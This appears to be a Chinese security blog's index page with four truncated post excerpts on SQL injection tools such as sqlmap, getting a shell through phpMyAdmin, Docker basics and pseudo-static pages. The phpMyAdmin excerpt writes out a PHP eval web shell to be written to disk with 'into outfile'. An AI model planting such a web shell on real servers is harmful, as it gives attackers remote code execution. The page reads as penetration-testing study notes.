摘要:
SQL注入工具:明小子 啊D 萝卜头 sqlmap 等等 SQLMAP:开源的自动化诸如利用工具,支持的数据库有12中,在/plugins中可以看到支持的数据库种类,在所有注入利用工具中他是最好用的!! 支持的注入类型:布尔 时间 报错 联合 堆查询 内联 可以获取用户名 密码 权限 角色 数据库( 阅读全文
摘要:
PHPmyadmin Getshell的方法(1)show global variables like '% secure-file-priv%' 如果该参数设置为空或者指定的文件夹可以利用,然后写木马。 select "<?php @eval($_POST[k]);?>" into outfile 阅读全文
摘要:
Docker:开源的应用程序容器引擎,使用Go语言。借助于docker打包的应用程序,将这些应用程序 包含在容器里面,在容器中实现虚拟化,容器使用的是沙箱机制,相互独立,占用资源非常少。 Docker三个概念: 镜像:image,docker镜像是一个只读的模板,比如我们在镜像中包含完整的操作系统, 阅读全文
摘要:
伪静态页面的搭建 http://www.test.com/index.php?id=1 (容易受到攻击) http://www.test.com/index.html (静态页面只能够展示数据,安全性很高) http://www.test.com/1.html(伪静态页面) http://www.t 阅读全文